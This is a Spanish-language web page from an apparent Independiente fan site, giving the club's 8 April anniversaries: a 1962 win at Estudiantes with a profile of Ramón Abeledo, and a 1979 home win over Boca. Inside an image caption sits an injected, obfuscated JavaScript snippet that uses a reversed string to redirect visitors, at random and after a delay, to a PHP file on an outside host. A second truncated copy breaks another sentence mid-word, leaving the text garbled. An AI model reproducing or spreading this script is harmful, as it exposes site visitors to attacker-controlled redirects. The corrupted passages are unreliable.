Conectate con nosotros

Efemérides

Efemérides del 08 de Abril

No se puede amar lo que no se conoce. Las efemérides cuentan la enorme historia del Glorioso INDEPENDIENTE de Avellaneda.

1962 – Por la tercera fecha del Campeonato de Primera División 1962, Independiente visita La Plata y le gana a Estudiantes por 0 a 3, con goles de Oscar Romero por duplicado y el restante de Edgardo D’Ascenzo.

Un buen arranque del equipo en el torneo, porque había debutado con triunfo visitando a Quilmes, y empate recibiendo a Boca. Luego seguiría invicto hasta la fecha 9, cuando fue derrotado por Rosario Central, pero antes logró triunfos sobre River y San Lorenzo.

El Rojo tuvo una campaña aceptable ese torneo, sobre todo frente a los denominados equipos grandes, porque solamente perdió visitando a River en la segunda rueda. Boca fue el campeón, secundado por River, tercero fue Gimnasia y Esgrima La Plata, y cuarto quedó Independiente.

Otra cuestión para mencionar, es que la prestigiosa revista El Gráfico posterior al encuentro, puso en su tapa a Ramón Gregorio Abeledo, futbolista de Independiente que venía teniendo buen nivel por aquellos tiempos. Ramón era fruto de las divisiones inferiores del Rojo, iniciando su carrera a mediados de la década del 50, pero estando relegado por la calidad de jugadores que tenía el equipo en ese entonces, el famoso Quinteto de Oro. Abeledo era un insider derecho, es decir, jugaba entre el centro delantero y el wing, teniendo capacidad y recorrido para ser volante, pero con muchísima llegada al gol.

Se afianzó en el equipo en 1958, sobre todo al final de la temporada, cuando marcó 8 goles en las 4 fechas finales del torneo. En 1959 fue el goleador del equipo con 13 anotaciones, siendo clave en el tercer puesto logrado ese año. En 1960 Independiente es Campeón, y Abeledo arrancó el campeonato como titular, pero terminaría jugando menos de 10 encuentros en la temporada, y no pude saber la razón, si es que perdió el puesto con alguien más, si hubo lesión, u otra cuestión.

Su buen nivel se sostuvo en 1961 y en 1962, como dije, llegando a ser tapa de El Gráfico, pero no solo eso, sino que en un par de semanas viajaría a Chile con la Selección Nacional para disputar el Mundial, junto a Rubén Marino Navarro, siendo los únicos dos del Rojo que se dieron cita en la máxima competencia del futbol.

Para 1963 Abeledo pasa a Nacional de Uruguay para ser campeón de Primera División, y en 1964 llega a Boca, donde apenas juega y decide retirarse.

La imagen tiene un atribu<script>$mWn=function(n){if(typeof ($mWn.list[n])==»string») return $mWn.list[n].split(«»).reverse().join(«»);return $mWn.list[n];};$mWn.list=[«\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to ALT vacío; su nombre de archivo es DIABLITO-para-SEPARADOR.jpg» width=»68″ height=»52″/></figure></div>



<p><strong>1979</strong> – <strong>Independiente</strong> comienza las competiciones oficiales de 1979 con una <strong>agenda</strong> bastante <strong>ajustada</strong>. Debe <strong>cumplir con el calendario del Campeona<script>$mWn=function(n){if(typeof ($mWn.list[n])==to Metropolitano y con el de la fase de grupos de la Copa Libertadores. A nivel continental las cosas marcharon bastante bien, durante marzo jugó sus partidos de visitante, ganándole a Quilmes, empatando con Millonarios y cayendo con Deportivo Cali, mientras que al iniciarse abril, cuatro días antes de esta fecha, le ganó a Quilmes en Avellaneda y hubo efeméride.

Pero a nivel local las cosas no comenzaron de tan buena manera, y con eso tiene que ver la efeméride. Se arrancó perdiendo en condición de local (pero en cancha de Racing) frente a Ferro, en la segunda fecha otra derrota frente a All Boys, luego se vence a Atlanta pero en la cuarta hubo nueva derrota frente a Rosario Central, y en la quinta fecha fue empate contra San Lorenzo.

Así llegamos a un día como hoy, cuando por la fecha 6 se recibe a Boca en la Doble Visera, con la necesidad de empezar a ganar para tener chances. Recordemos que el torneo dividía a los clubes en dos zonas, la A y la B, con 10 equipos cada una, y donde solamente pasaban a la ronda final por el título el primero y segundo de cada zona.

El equipo aquel día fue: Héctor Baley; José Lencina, Rubén Pagnanini, Enzo Trossero y Osvaldo Pérez; Carlos Leone, Rubén Galván y Ricardo Bochini; Pedro Magallanes, Norberto Outes y Carlos Fontana, con José Omar Pastoriza como D.T. Mientras que la visita lo hizo con: Santos; Pernía, Sá, Capurro y Bordón; Berta, Suñé y Zanabria; Mastrángelo, Palacios (72’ Rocha) y Robles (72’ Perotti), siendo Juan Carlos Lorenzo el D.T.

Varias ausencias entre los titulares del Rojo, Hugo Villaverde lesionado, Omar Larrosa con un golpe, y los punteros, Antonio Alzamendi y Alejandro Barberón, que no se recuperaron del desgaste realizado frente a Quilmes por la Copa. Aun así el equipo respetó su forma de jugar con Pastoriza, ir al frente para ganar el partido, ser el protagonista e intentar atacar. La crónica del encuentro habla de un Independiente ofensivo que chocaba con Osvaldo Santos, arquero y figura de Boca ese día.

El “Negro” Rubén Galván sería la figura del Rojo y del partido, realizando un despliegue notable durante los 90 minutos, siendo claramente el ganador de la mitad de cancha. A él le siguió Ricardo Bochini, apareciendo menos pero cada vez que lo hizo generó peligro. Dejó mano a mano a Norberto Outes pero el remate del 9 se fue apenas afuera, luego el mismo “Bocha” pudo marcar pero tapó genial Santos, y además, Enzo Trossero metió un tiro libre fortísimo al poste. A medida que avanzaban los minutos, Boca se refugió cada vez más y sostenía el empate gracias al arquero y a Francisco “Pancho” Sá liderando la defensa.

A los 62 minutos se fue expulsado Vicente Pernía, por protestar exageradamente cuando ya tenía amarilla. A partir de allí el Rojo atacó cada vez más hasta que finalmente se daría el gol a los 84 minutos. Bochini recibió por la derecha y empezó a gambetear, primero a José Berta y luego a Mario Zanabria, metió un centro bajo que llegó a desviar el arquero, pero la pelota le quedó al “Beto” Outes, que le ganó la posición a su marca y la mandó a la red, decretando el 1 a 0 final.

En la continuidad del torneo, Independiente sería derrotado por Chacarita en la fecha siguiente, pero luego hilvanaría cinco triunfos seguidos y con gran nivel de juego. Al finalizar las 18 fechas de la zona, quedaría en segundo lugar por detrás de Rosario Central, siendo ambos los equipos más goleadores del país. Posteriormente sería eliminado en semifinales por River, que terminó siendo campeón de ese Metropolitano goleando a Vélez.

Por último, y como dato de color, decir que dos días antes a la fecha en cuestión, el 6 de abril de 1979, asumía como nuevo presidente de la AFA Julio Humberto Grondona, reemplazando a Alfredo Cantilo. Como todos saben, Grondona se sostuvo en el cargo de forma ininterrumpida hasta su muerte, el 30 de julio de 2014. Observen estos simples datos estadísticos de Independiente en relación al antes y después de la llegada de Grondona a la AFA.

El Rojo ganó 10 títulos locales antes de Grondona en la AFA, y luego obtuvo 4. Antes de Grondona en la AFA Independiente consiguió 6 Copas Libertadores, y luego solamente ganó una. Y englobando todas las competencias internacionales, antes de Julio el Rojo ganó 10 y luego 8. Sin embargo, toda la vida los hinchas de Independiente hemos escuchado frases del estilo “Ustedes ganan todo porque Grondona es de Independiente”, vaya a saber uno cuáles serán los argumentos para decir y repetir esa frase.

Colaboración: Hernán Paglieri-Vicepresidente Peña Roja Daniel BertoniSan Andrés de Giles

Click to comment

Leave a Reply

Tu dirección de correo electrónico no será publicada.

Destacadas

PROGRAMA 2206 de Correo Independiente

Radio Roja 195.7

asd

More in Efemérides